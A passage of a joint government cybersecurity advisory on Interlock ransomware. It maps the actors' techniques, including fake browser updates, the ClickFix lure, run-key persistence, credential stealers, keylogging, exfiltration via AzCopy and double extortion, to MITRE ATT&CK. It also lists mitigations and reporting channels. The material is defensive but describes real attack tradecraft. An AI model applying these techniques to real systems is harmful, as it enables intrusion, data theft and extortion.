<table class="tablesaw tablesaw-stack">
<caption>Table 5. Initial Access</caption>
<thead>
<tr>
<th role="columnheader">Technique Title</th>
<th role="columnheader">ID</th>
<th role="columnheader">Use</th>
</tr>
</thead>
<tbody>
<tr>
<td>Drive-By Compromise</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1189/" target="_blank">T1189</a></td>
<td>
<p>Interlock actors obtain initial access by compromising a legitimate website that network users visit, or by disguising malicious payloads as fake browser updates or common security software, including the following:<a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-203a#note17"><sup>17</sup></a></p>
<ul>
<li>FortiClient.exe</li>
<li>Ivanti-Secure-Access-Client.exe</li>
<li>GlobalProtect.exe</li>
<li>Webex.exe</li>
<li>AnyConnectVPN.exe</li>
<li>Cisco-Secure-Client.exe</li>
<li>zyzoom_antimalware.exe</li>
</ul>
<p>Interlock actors also gain access via the ClickFix social engineering technique, in which users are tricked into executing a malicious payload by clicking on a fake CAPTCHA that prompts users to execute a malicious PowerShell script.&nbsp;<br />&nbsp;</p>
</td>
</tr>
</tbody>
</table>
<table class="tablesaw tablesaw-stack">
<caption>Table 6. Execution</caption>
<thead>
<tr>
<th role="columnheader">Technique Title</th>
<th role="columnheader">ID</th>
<th role="columnheader">Use</th>
</tr>
</thead>
<tbody>
<tr>
<td>Command and Scripting Interpreter: PowerShell</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1059/001/" target="_blank">T1059.001&nbsp;</a></td>
<td>
<p>Interlock actors implement PowerShell scripts to drop a malicious file into the Windows Startup folder.</p>
<p>Interlock actors execute a PowerShell command for registry key modification.</p>
<p>Interlock actors use a PowerShell script to execute a series of commands to facilitate reconnaissance.</p>
</td>
</tr>
<tr>
<td>User Execution: Malicious Copy and Paste</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1204/004/" target="_blank">T1204.004</a></td>
<td>Via the ClickFix social engineering technique, users are tricked into clicking a fake CAPTCHA and prompted into executing a malicious Base64-encoded PowerShell process by following instructions to open a Windows Run window (Windows Button + R), pasting clipboard contents (“CTRL + V”), and then executing the malicious script (“Enter”).</td>
</tr>
</tbody>
</table>
<table class="tablesaw tablesaw-stack">
<caption>Table 7. Persistence</caption>
<thead>
<tr>
<th role="columnheader">Technique Title</th>
<th role="columnheader">ID</th>
<th role="columnheader">Use</th>
</tr>
</thead>
<tbody>
<tr>
<td>Boot or Logon Autostart Execution: Registry Run Keys/Startup Folder</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1547/001/" target="_blank">T1547.001</a></td>
<td>
<p>Interlock actors establish persistence by adding a file into a Windows StartUp folder that executes a RAT every time a user logs in.</p>
<p>Interlock actors also implement registry key modification by using a PowerShell command to add a run key value (named “Chrome Updater”) that uses a log file as an argument every time a user logs in.<br />&nbsp;</p>
</td>
</tr>
</tbody>
</table>
<table class="tablesaw tablesaw-stack">
<caption>Table 8. Privilege Escalation</caption>
<thead>
<tr>
<th role="columnheader">Technique Title</th>
<th role="columnheader">ID</th>
<th role="columnheader">Use</th>
</tr>
</thead>
<tbody>
<tr>
<td>Valid Accounts: Domain Accounts</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1078/002/" target="_blank" title="T1078.002">T1078.002</a></td>
<td>Interlock actors compromise domain administrator accounts to gain additional privileges.&nbsp;</td>
</tr>
</tbody>
</table>
<table class="tablesaw tablesaw-stack">
<caption>Table 9. Defense Escalation</caption>
<thead>
<tr>
<th role="columnheader">Technique Title</th>
<th role="columnheader">ID</th>
<th role="columnheader">Use</th>
</tr>
</thead>
<tbody>
<tr>
<td>Defense Evasion</td>
<td><a href="https://attack.mitre.org/versions/v17/tactics/TA0005/" title="TA0005">TA0005</a></td>
<td>Interlock actors execute the <code>removeme</code> function on Linux systems to delete the encryption binary for defense evasion.&nbsp;</td>
</tr>
<tr>
<td>Masquerading: Match Legitimate Resource Name or Location</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1036/005/" target="_blank" title="T1036.005">T1036.005</a></td>
<td>
<p>Interlock actors disguise a malicious run key value by naming it “Chrome Updater”; the run key value uses a specific log file as an argument upon user login.</p>
<p>Interlock actors disguise files of keystrokes logged by one of their credential stealers with a legitimate Windows filename: <code>conhost.txt</code>.</p>
<p>Interlock actors disguise an encryption binary, a 64-bit executable, by giving it the same name as the legitimate Console Windows Host executable: <code>conhost.exe</code></p>
</td>
</tr>
<tr>
<td>System Binary Proxy Execution: Rundll32</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1218/011/" target="_blank" title="T1218.011">T1218.011</a></td>
<td>Interlock actors use <code>rundll32.exe</code> to proxy execution of a malicious DLL binary <code>tmp41.wasd</code>.&nbsp;</td>
</tr>
<tr>
<td>Indicator Removal: File Deletion</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1070/004/" target="_blank" title="T1070.004">T1070.004</a></td>
<td>Interlock actors execute a DLL binary <code>tmp41.wasd</code> that uses the <code>remove()</code> function to delete their encryption binary for defense evasion.&nbsp;</td>
</tr>
</tbody>
</table>
<table class="tablesaw tablesaw-stack">
<caption>Table 10. Credential Access</caption>
<thead>
<tr>
<th role="columnheader">Technique Title</th>
<th role="columnheader">ID</th>
<th role="columnheader">Use</th>
</tr>
</thead>
<tbody>
<tr>
<td>Credential Access</td>
<td><a href="https://attack.mitre.org/versions/v17/tactics/TA0006/" target="_blank" title="TA0006">TA0006</a></td>
<td>Interlock actors download credential stealer <code>cht.exe </code>and execute other versions information stealers (including Lumma Stealer and Berserk Stealer) to harvest credentials.</td>
</tr>
<tr>
<td>Credentials from Password Stores: Credentials from Web Browsers</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1555/003/" target="_blank" title="T1555.003">T1555.003</a></td>
<td>Interlock actors download a credential stealer that collects login information and associated URLs for victims’ online accounts.</td>
</tr>
<tr>
<td>Input Capture</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1056/" target="_blank" title="T1056">T1056</a></td>
<td>Interlock actors execute Lumma Stealer and Berserk Stealer information stealers on victim systems.</td>
</tr>
<tr>
<td>Input Capture: Keylogging</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1056/001/" target="_blank" title="T1056.001">T1056.001</a></td>
<td>Interlock actors download <code>klg.dll</code>, a keylogger binary, onto compromised systems, where it logs users’ keystrokes in a file named <code>conhost.txt</code>.&nbsp;</td>
</tr>
<tr>
<td>Steal or Forge Kerberos Tickets: Kerberoasting</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1558/003/" target="_blank" title="T1558.003">T1558.003</a></td>
<td>Interlock actors possibly use a Kerberoasting attack to compromise domain administrator accounts.&nbsp;</td>
</tr>
</tbody>
</table>
<table class="tablesaw tablesaw-stack">
<caption>Table 11. Discovery</caption>
<thead>
<tr>
<th role="columnheader">Technique Title</th>
<th role="columnheader">ID</th>
<th role="columnheader">Use</th>
</tr>
</thead>
<tbody>
<tr>
<td>System Owner/User Discovery</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1033/" target="_blank" title="T1033">T1033</a></td>
<td>Interlock actors execute a PowerShell command <code>WindowsIdentity.GetCurrent()</code> on victim systems to retrieve a WindowsIdentity object that represents the current Windows user.</td>
</tr>
<tr>
<td>System Information Discovery</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1082/" target="_blank" title="T1082">T1082</a></td>
<td>
<p>Interlock actors execute a PowerShell command <code>systeminfo</code> on victim systems to access detailed configuration information about the system, including OS configuration, security information, product ID, and hardware properties.</p>
<p>Interlock actors execute a PowerShell command <code>Get-PSDrive</code> on victim systems to discover the drives in the current session, such as:&nbsp;</p>
<ul>
<li>Windows logical drives on the computer, including drives mapped to network shares.</li>
<li>Drives exposed by PowerShell providers.</li>
<li>Session-specified temporary drives and persistent mapped network drives.</li>
</ul>
</td>
</tr>
<tr>
<td>System Service Discovery</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1007/" target="_blank" title="T1007">T1007</a></td>
<td>
<p>Interlock actors execute a PowerShell command <code>tasklist /svc</code> on victim systems that lists service information for each process currently running on the system.&nbsp;</p>
<p>Actors also execute a PowerShell command <code>Get-Service</code> on victim systems that retrieves objects that represent the services (including running and stopped services) on the system.</p>
</td>
</tr>
<tr>
<td>System Network Configuration Discovery</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1016/" target="_blank" title="T1016">T1016</a></td>
<td>Interlock actors execute a PowerShell command <code>arp -a</code> on victim systems that displays and modifies entries in the Address Resolution Protocol (ARP) cache table (which contains entries on the IPv4 and IPv6 addresses on host endpoints).</td>
</tr>
</tbody>
</table>
<table class="tablesaw tablesaw-stack">
<caption>Table 12. Lateral Movement</caption>
<thead>
<tr>
<th role="columnheader">Technique Title</th>
<th role="columnheader">ID</th>
<th role="columnheader">Use</th>
</tr>
</thead>
<tbody>
<tr>
<td>Valid Accounts</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1078/" target="_blank" title="T1078">T1078</a></td>
<td>Interlock actors harvest and abuse valid credentials for lateral movement and privilege escalation.</td>
</tr>
<tr>
<td>Remote Services: Remote Desktop Protocol</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1021/001/" target="_blank" title="T1021.001">T1021.001</a></td>
<td>Interlock actors use RDP and valid credentials to move laterally between systems.</td>
</tr>
</tbody>
</table>
<table class="tablesaw tablesaw-stack">
<caption>Table 13. Collection</caption>
<thead>
<tr>
<th role="columnheader">Technique Title</th>
<th role="columnheader">ID</th>
<th role="columnheader">Use</th>
</tr>
</thead>
<tbody>
<tr>
<td>Data from Cloud Storage</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1530/" title="T1530">T1530</a></td>
<td>Interlock actors use <code>StorageExplorer.exe</code>, the cloud storage solution Azure Storage Explorer, to explore Microsoft Azure Storage accounts.&nbsp;</td>
</tr>
</tbody>
</table>
<table class="tablesaw tablesaw-stack">
<caption>Table 14. Command and Control</caption>
<thead>
<tr>
<th role="columnheader">Technique Title</th>
<th role="columnheader">ID</th>
<th role="columnheader">Use</th>
</tr>
</thead>
<tbody>
<tr>
<td>Command and Control</td>
<td><a href="https://attack.mitre.org/versions/v17/tactics/TA0011/" target="_blank" title="TA0011">TA0011</a></td>
<td>Interlock actors use applications Cobalt Strike and SystemBC for C2.&nbsp;</td>
</tr>
<tr>
<td>Ingress Tool Transfer</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1105/" target="_blank" title="T1105">T1105</a></td>
<td>
<p>Interlock actors use a fake Google Chrome or Microsoft Edge browser update to cause users to execute a RAT on the victimized system.</p>
<p>Interlock actors download credential stealers (<code>cht.exe</code>) and keylogger binaries (<code>klg.dll</code>) once actors establish remote control of a compromised system.&nbsp;</p>
</td>
</tr>
<tr>
<td>Remote Access Tools</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1219/" target="_blank" title="T1219">T1219</a></td>
<td>Interlock actors use legitimate remote access tools such as AnyDesk to enable remote connectivity and PuTTY to assist with lateral movement.</td>
</tr>
</tbody>
</table>
<table class="tablesaw tablesaw-stack">
<caption>Table 15. Exfiltration</caption>
<thead>
<tr>
<th role="columnheader">Technique Title&nbsp;</th>
<th role="columnheader">ID</th>
<th role="columnheader">Use</th>
</tr>
</thead>
<tbody>
<tr>
<td>Exfiltration Over Web Service: Exfiltration to Cloud Storage</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1567/002/" target="_blank" title="T1567.002">T1567.002</a></td>
<td>Interlock actors exfiltrate data to cloud storage by executing AzCopy to upload data to the Azure storage blob.</td>
</tr>
<tr>
<td>Exfiltration Over Alternative Protocol</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1048/" target="_blank" title="T1048">T1048</a></td>
<td>Interlock actors use file transfer tools like WinSCP to exfiltrate data.</td>
</tr>
</tbody>
</table>
<table class="tablesaw tablesaw-stack">
<caption>Table 16. Impact</caption>
<thead>
<tr>
<th role="columnheader">Technique Title&nbsp;</th>
<th role="columnheader">ID</th>
<th role="columnheader">Use</th>
</tr>
</thead>
<tbody>
<tr>
<td>Data Encrypted for Impact</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1486/" target="_blank" title="T1486">T1486</a></td>
<td>
<p>Interlock actors encrypt victim data using a combined AES and RSA algorithm on compromised systems to interrupt availability to system and network resources. Actors code encryptors using C/C++. Interlock actors use encryptors for both Windows and Linux operating systems.&nbsp;</p>
<p>Interlock actors also use a FreeBSD ELF encryptor to encrypt victim data.&nbsp;</p>
</td>
</tr>
<tr>
<td>Financial Theft&nbsp;&nbsp;</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1657/" target="_blank" title="T1657">T1657</a></td>
<td>Interlock actors deliver a ransom note titled <code>!__README__!.txt</code> via a GPO which provides victims with instructions to use a <code>.onion </code>URL to contact the actors over the Tor network. Actors use a double-extortion model, both encrypting victim data and threatening release of victim data on their Tor network leak site if the ransom is not paid.</td>
</tr>
</tbody>
</table>
<h2><a class="ck-anchor" id="mitigations"><strong>Mitigations</strong></a></h2>
<p>The authoring agencies recommend organizations implement the mitigations below to improve your organization’s cybersecurity posture on the basis of the Interlock ransomware actors’ activity. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats and TTPs. Visit CISA’s <a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals" title="CPGs webpage">CPGs webpage</a> for more information on the CPGs, including additional recommended baseline protections.</p>
<p>In addition to the below mitigations, Healthcare and Public Health (HPH) organizations should use <a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals" target="_blank" title="HPH Sector CPGs">HPH Sector CPGs</a> to implement cybersecurity protections to address the most common threats and TTPs used against this sector.</p>
<p>At-risk organizations should implement the following mitigations:</p>
<ul>
<li><strong>Prevent Interlock ransomware actors from obtaining initial access</strong>:
<ul>
<li><strong>Implement domain name system (DNS) filtering</strong> to block users from accessing malicious sites and applications.</li>
<li><strong>Implement web access firewalls</strong> to mitigate and prevent unknown commands or process injection from malicious domains or websites.</li>
<li><strong>Train users</strong> [<a href="https://www.cisa.gov/cybersecurity-performance-goals-cpgs#BasicCybersecurityTraining2I">CPG 2.I</a>] to identify, avoid, and report <strong>social engineering attempts</strong>.</li>
</ul>
</li>
<li><strong>Implement a recovery plan</strong> [<a href="https://www.cisa.gov/cybersecurity-performance-goals-cpgs#IncidentPlanningandPreparedness5A" title="CPG 5.A">CPG 5.A</a>] to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, and secure location (e.g., hard drive, storage device, the cloud) [<a href="https://www.cisa.gov/cybersecurity-performance-goals-cpgs#SystemBackups2R" title="CPG 2.R">CPG 2.R</a>].</li>
<li><strong>Require all accounts&nbsp;</strong>with password logins (e.g., service accounts, admin accounts, and domain admin accounts) to comply with <a href="https://pages.nist.gov/800-63-4/sp800-63b/passwords/" target="_blank" title="NIST password standards">NIST password standards</a>.
<ul>
<li>Require employees to use long passwords [<a href="https://www.cisa.gov/cybersecurity-performance-goals-cpgs#MinimumPasswordStrength2B" title="CPG 2.B">CPG 2.B</a>] and consider not requiring recurring password changes, as these can weaken security.</li>
</ul>
</li>
<li><strong>Require MFA&nbsp;</strong>[<a href="https://www.cisa.gov/cybersecurity-performance-goals-cpgs#PhishingResistantMultifactorAuthenticationMFA2H" title="CPG 2.H">CPG 2.H</a>] for all services to the extent possible, particularly for webmail, virtual private networks (VPNs), and accounts that access critical systems.
<ul>
<li>Implement ICAM policies across the organization as a precursor to MFA.</li>
</ul>
</li>
<li><strong>Keep all operating systems, software, and firmware up to date</strong>; prioritize patching <a href="https://www.cisa.gov/known-exploited-vulnerabilities-catalog" title="known exploited vulnerabilities">known exploited vulnerabilities</a> in internet-facing systems [<a href="https://www.cisa.gov/cybersecurity-performance-goals-cpgs#MitigatingKnownVulnerabilities1E" title="CPG 1.E">CPG 1.E</a>].
<ul>
<li>Timely patching is efficient and cost effective for minimizing an organization’s exposure to cybersecurity threats.</li>
</ul>
</li>
<li><strong>Implement robust EDR capabilities</strong> on VMs, systems, and networks.</li>
<li><strong>Segment networks</strong> [<a href="https://www.cisa.gov/cybersecurity-performance-goals-cpgs#NetworkSegmentation2F" title="CPG 2.F">CPG 2.F</a>] to prevent the spread of ransomware.
<ul>
<li>Network segmentation can help prevent the spread of ransomware by controlling traffic flows between—and access to—various subnetworks and by restricting adversary lateral movement.</li>
</ul>
</li>
<li><strong>Identify, detect, and investigate abnormal activity and potential traversal of the indicated ransomware </strong>[<a href="https://www.cisa.gov/cybersecurity-performance-goals-cpgs#DetectingRelevantThreatsandTTPs3A" title="CPG 3.A">CPG 3.A</a>] <strong>with a networking monitoring tool </strong>[<a href="https://www.cisa.gov/cybersecurity-performance-goals-cpgs#LogCollection2T" title="CPG 2.T">CPG 2.T</a>].
<ul>
<li>To aid in detecting ransomware, implement a tool that logs and reports all network traffic, including lateral movement activity on a network.</li>
<li>Implement EDR tools; these are useful for detecting lateral connections as they provide insight into common and uncommon network connections for each host.</li>
</ul>
</li>
<li><strong>Filter network traffic</strong> by preventing unknown or untrusted origins from accessing remote services on internal systems.
<ul>
<li>This prevents threat actors from directly connecting to remote access services that they have established for persistence.</li>
</ul>
</li>
<li><strong>Install, regularly update, and enable real time detection for antivirus software&nbsp;</strong>on all hosts.</li>
<li><strong>Review domain controllers, servers, workstations, and active directories&nbsp;</strong>for new and/or unrecognized accounts.</li>
<li><strong>Audit user accounts with administrative privileges</strong> and configure access controls according to the principle of least privilege [<a href="https://www.cisa.gov/cybersecurity-performance-goals-cpgs#SeparatingUserandPrivilegedAccounts2E" title="CPG 2.E">CPG 2.E</a>].</li>
<li><strong>Disable unused ports</strong>.</li>
<li><strong>Consider adding an email banner to emails</strong> received from outside of your organization [<a href="https://www.cisa.gov/cybersecurity-performance-goals-cpgs#EmailSecurity2M" title="CPG 2.M">CPG 2.M</a>].</li>
<li><strong>Disable hyperlinks</strong> in received emails.</li>
<li><strong>Implement time-based access for accounts set at the admin level and higher;&nbsp;</strong>for example, the just-in-time (JIT) access method provisions privileged access when needed and can support enforcement of the principle of least privilege (as well as the <a href="https://www.cisa.gov/zero-trust-maturity-model" title="Zero Trust model">Zero Trust model</a>):
<ul>
<li>This is a process where a network-wide policy is set in place to automatically disable admin accounts at the Active Directory level when the account is not in direct need.</li>
<li>Individual users may submit their requests through an automated process that grants them access to a specified system for a set timeframe when they need to support the completion of a certain task.</li>
</ul>
</li>
<li><strong>Disable command line and scripting activities and permissions </strong>[<a href="https://www.cisa.gov/cybersecurity-performance-goals-cpgs#DisableMacrosbyDefault2N" title="CPG 2.N">CPG 2.N</a>].
<ul>
<li>Disabling software utilities that run from the command line makes it more difficult for threat actors to escalate privileges and move laterally.</li>
</ul>
</li>
<li><strong>Maintain offline backups of data</strong> and regularly maintain backups and restorations [<a href="https://www.cisa.gov/cybersecurity-performance-goals-cpgs#SystemBackups2R" title="CPG 2.R">CPG 2.R</a>]; this avoids severe service interruption and irretrievable data in the event of a compromise.</li>
<li><strong>Ensure all backup data is encrypted, immutable&nbsp;</strong>(i.e., cannot be altered or deleted), and covers the entire organization’s data infrastructure [<a href="https://www.cisa.gov/cybersecurity-performance-goals-cpgs#SystemBackups2R" title="CPG 2.R">CPG 2.R</a>].</li>
</ul>
<h2><a class="ck-anchor" id="validate-security-controls"><strong>Validate Security Controls</strong></a></h2>
<p>In addition to applying mitigations, the authoring agencies recommend exercising, testing, and validating your organization&#8217;s security program against the threat behaviors mapped to the MITRE ATT&amp;CK for Enterprise framework in this advisory. The authoring agencies recommend testing your existing security controls inventory to assess how they perform against the ATT&amp;CK techniques described in this advisory.</p>
<p>To get started:</p>
<ol>
<li>Select an ATT&amp;CK technique described in this advisory (see <strong>Table 5&nbsp;</strong>through <strong>Table 16</strong>).</li>
<li>Align your security technologies against the technique.</li>
<li>Test your technologies against the technique.</li>
<li>Analyze your detection and prevention technologies’ performance.</li>
<li>Repeat the process for all security technologies to obtain a set of comprehensive performance data.</li>
<li>Tune your security program, including people, processes, and technologies, based on the data generated by this process.</li>
</ol>
<p>The authoring agencies recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&amp;CK techniques identified in this advisory.</p>
<h2><a class="ck-anchor" id="resources"><strong>Resources</strong></a></h2>
<ul>
<li><a href="https://www.cisa.gov/stopransomware" target="_blank" title="Stopransomware.gov">Stopransomware.gov</a>: Whole-of-government, central location for ransomware resources and alerts.</li>
<li><a href="https://www.cisa.gov/stopransomware" target="_blank" title="HHS Cyber Gateway">HHS Cyber Gateway</a>: Contains key resources for HPH entities to bolster their cyber resilience.</li>
<li><a href="https://www.cisa.gov/resources-tools/resources/stopransomware-guide" title="#StopRansomware Guide">#StopRansomware Guide</a>: Resource to mitigate a ransomware attack.</li>
<li><a href="https://www.cisa.gov/cyber-hygiene-services" title="Cyber Hygiene Services">Cyber Hygiene Services</a>, <a href="https://www.cisa.gov/cyber-hygiene-services" target="_blank" title="Ransomware Readiness Assessment">Ransomware Readiness Assessment</a>: CISA’s no-cost cyber hygiene services.</li>
<li><a href="https://www.cisa.gov/cyber-hygiene-services" target="_blank" title="MS-ISAC Services">MS-ISAC Services</a>: MS-ISAC’s no-cost cybersecurity services for state, local, tribal, and territorial (SLTT) entities.</li>
<li><a href="https://www.cisa.gov/cyber-hygiene-services" target="_blank" title="Ransomware Defense-in-Depth">Ransomware Defense-in-Depth</a>: MS-ISAC guidance for SLTT entities to mitigate the threat of ransomware using a defense-in-depth strategy.</li>
<li><a href="https://www.cisa.gov/cyber-hygiene-services" target="_blank" title="Combatting Ransomware">Combatting Ransomware</a>: MS-ISAC guidance on ransomware mitigation strategies aligned with recommendations from NIST and CSF.</li>
</ul>
<h2><a class="ck-anchor" id="reporting"><strong>Reporting</strong></a></h2>
<p>Your organization has no obligation to respond or provide information back to FBI in response to this joint advisory. If, after reviewing the information provided, your organization decides to provide information to FBI, reporting must be consistent with applicable state and federal laws.</p>
<p>FBI is interested in any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with threat actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file.</p>
<p>Additional details of interest include a targeted company point of contact, status and scope of infection, estimated loss, operational impact, transaction IDs, date of infection, date detected, initial attack vector, and host- and network-based indicators.</p>
<p>The authoring agencies do not encourage paying ransom as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, FBI and CISA urge you to promptly report ransomware incidents to FBI’s <a href="https://www.ic3.gov/Home/ComplaintChoice" target="_blank" title="Internet Crime Complain Center (IC3)">Internet Crime Complain Center (IC3)</a>, a <a href="https://www.fbi.gov/contact-us/field-offices" target="_blank" title="local FBI Field Office">local FBI Field Office</a>, or CISA via the agency’s <a href="https://myservices.cisa.gov/irf" target="_blank" title="Incident Reporting System">Incident Reporting System</a> or its 24/7 Operations Center (<a href="mailto:contact@mail.cisa.dhs.gov" title="contact@mail.cisa.dhs.gov">contact@mail.cisa.dhs.gov</a>) or by calling 1-844-Say-CISA (1-844-729-2472).</p>
<p>State, local, tribal, and territorial governments should report incidents to the MS-ISAC (<a href="mailto:SOC@cisecurity.org" title="SOC@cisecurity.org">SOC@cisecurity.org</a> or 866-787-4722).</p>
<p>HPH Sector organizations should report incidents to FBI or CISA but also can reach out to HHS at <a href="mailto:HHScyber@hhs.gov">HHScyber@hhs.gov</a> for cyber incident support focused on mitigating adverse patient impacts.</p>
<h2><a class="ck-anchor" id="disclaimer"><strong>Disclaimer</strong></a></h2>
<p>The information in this report is being provided “as is” for informational purposes only. The authoring agencies do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favor by the authoring agencies.&nbsp;</p>
<h2><a class="ck-anchor" id="acknowledgements"><strong>Acknowledgements</strong></a></h2>
<p>Cisco Talos contributed to this advisory.</p>
<h2><a class="ck-anchor" id="version-history"><strong>Version History</strong></a></h2>
<p><strong>July 22, 2025</strong>: Initial version.</p>
<h2><a class="ck-anchor" id="notes"><strong>Notes</strong></a></h2>
<p><a class="ck-anchor" id="note1"><sup>1</sup></a> Elio Biasiotto, et. al., “Unwrapping the Emerging Interlock Ransomware Attack,” <em>Talos Intelligence</em> (blog), <em>Cisco Talos</em>, last modified November 7, 2024, <a href="https://blog.talosintelligence.com/emerging-interlock-ransomware/" target="_blank" title="https://blog.talosintelligence.com/emerging-interlock-ransomware/">https://blog.talosintelligence.com/emerging-interlock-ransomware/</a>.</p>
<p><a class="ck-anchor" id="note2"><sup>2</sup></a> Sekoia Threat Detection and Research team, “Interlock Ransomware Evolving Under the Radar,” <em>Sekoia&nbsp;</em>(blog), <em>Sekoia</em>, last modified April 16, 2025, <a href="https://blog.sekoia.io/interlock-ransomware-evolving-under-the-radar/" target="_blank" title="https://blog.sekoia.io/interlock-ransomware-evolving-under-the-radar/">https://blog.sekoia.io/interlock-ransomware-evolving-under-the-radar/</a>.</p>
<p><a class="ck-anchor" id="note3"><sup>3</sup></a> Yashvi Shah and Vignesh Dhatchanamoorthy, “ClickFix Deception: A Social Engineering Tactic to Deploy Malware,” <em>McAfee Labs&nbsp;</em>(blog), <em>McAfee</em>,last modified June 11, 2024,<em>&nbsp;</em><a href="https://www.mcafee.com/blogs/other-blogs/mcafee-labs/clickfix-deception-a-social-engineering-tactic-to-deploy-malware/" target="_blank" title="https://www.mcafee.com/blogs/other-blogs/mcafee-labs/clickfix-deception-a-social-engineering-tactic-to-deploy-malware/">https://www.mcafee.com/blogs/other-blogs/mcafee-labs/clickfix-deception-a-social-engineering-tactic-to-deploy-malware/</a> and “HC3 Sector Alert: ClickFix Attacks,” Health Sector Cybersecurity Coordination Center, Department of Health and Human Services, last modified October 29, 2024, <a href="https://www.hhs.gov/sites/default/files/clickfix-attacks-sector-alert-tlpclear.pdf" target="_blank" title="https://www.hhs.gov/sites/default/files/clickfix-attacks-sector-alert-tlpclear.pdf">https://www.hhs.gov/sites/default/files/clickfix-attacks-sector-alert-tlpclear.pdf</a>.</p>
<p><a class="ck-anchor" id="note4"><sup>4</sup></a> Shah, “<a href="https://www.mcafee.com/blogs/other-blogs/mcafee-labs/clickfix-deception-a-social-engineering-tactic-to-deploy-malware/" target="_blank" title="ClickFix Deception: A Social Engineering Tactic to Deploy Malware">ClickFix Deception: A Social Engineering Tactic to Deploy Malware</a>.”</p>
<p><a class="ck-anchor" id="note5"><sup>5</sup></a> Sekoia Threat Detection and Research team, “<a href="https://blog.sekoia.io/interlock-ransomware-evolving-under-the-radar/" target="_blank">Interlock Ransomware Evolving Under the Radar.</a>”</p>
<p><a class="ck-anchor" id="note6"><sup>6</sup></a> Bill Toulas, “Interlock Ransomware Gang Deploys New NodeSnake RAT on Universities,“ <em>Bleeping Computer</em>, May 28, 2025, <a href="https://www.bleepingcomputer.com/news/security/interlock-ransomware-gang-deploys-new-nodesnake-rat-on-universities/" target="_blank" title="https://www.bleepingcomputer.com/news/security/interlock-ransomware-gang-deploys-new-nodesnake-rat-on-universities/">https://www.bleepingcomputer.com/news/security/interlock-ransomware-gang-deploys-new-nodesnake-rat-on-universities/</a>.</p>
<p><a class="ck-anchor" id="note7"><sup>7</sup></a> Biasiotto, “<a href="https://blog.talosintelligence.com/emerging-interlock-ransomware/" target="_blank" title="Unwrapping the Emerging Interlock Ransomware Attack">Unwrapping the Emerging Interlock Ransomware Attack</a>.”</p>
<p><a class="ck-anchor" id="note8"><sup>8</sup></a> International law-enforcement and Microsoft took down the Lumma Stealer malware in May 2025 by seizing internet domains the actors used to distribute the malware to actors and taking down domains that hosted the malware’s infrastructure. For more information, see Tara Seals, “Lumma Stealer Takedown Reveals Sprawling Operation,” <em>Dark Reading,&nbsp;</em>May 21, 2025,<em>&nbsp;</em><a href="https://www.darkreading.com/cybersecurity-operations/lumma-stealer-takedown-sprawling-operation" target="_blank" title="https://www.darkreading.com/cybersecurity-operations/lumma-stealer-takedown-sprawling-operation">https://www.darkreading.com/cybersecurity-operations/lumma-stealer-takedown-sprawling-operation</a>, and Steven Masada, “Disrupting Lumma Stealer: Microsoft Leads Global Action Against Favored Cybercrime Tool,” <em>Microsoft On the Issues</em> (blog), <em>Microsoft</em>, last modified May 21, 2025, <a href="https://blogs.microsoft.com/on-the-issues/2025/05/21/microsoft-leads-global-action-against-favored-cybercrime-tool/" target="_blank" title="https://blogs.microsoft.com/on-the-issues/2025/05/21/microsoft-leads-global-action-against-favored-cybercrime-tool/">https://blogs.microsoft.com/on-the-issues/2025/05/21/microsoft-leads-global-action-against-favored-cybercrime-tool/</a>.</p>
<p><a class="ck-anchor" id="note9"><sup>9</sup></a> Sekoia Threat Detection and Research team, “<a href="https://blog.sekoia.io/interlock-ransomware-evolving-under-the-radar/" target="_blank" title="Interlock Ransomware Evolving Under the Radar">Interlock Ransomware Evolving Under the Radar</a>.”</p>
<p><a class="ck-anchor" id="note10"><sup>10</sup></a> Biasiotto, “<a href="https://blog.talosintelligence.com/emerging-interlock-ransomware/" target="_blank" title="Unwrapping the Emerging Interlock Ransomware Attack">Unwrapping the Emerging Interlock Ransomware Attack</a>.”</p>
<p><a class="ck-anchor" id="note11"><sup>11</sup></a> Biasiotto, “<a href="https://blog.talosintelligence.com/emerging-interlock-ransomware/" target="_blank">Unwrapping the Emerging Interlock Ransomware Attack</a>.”</p>
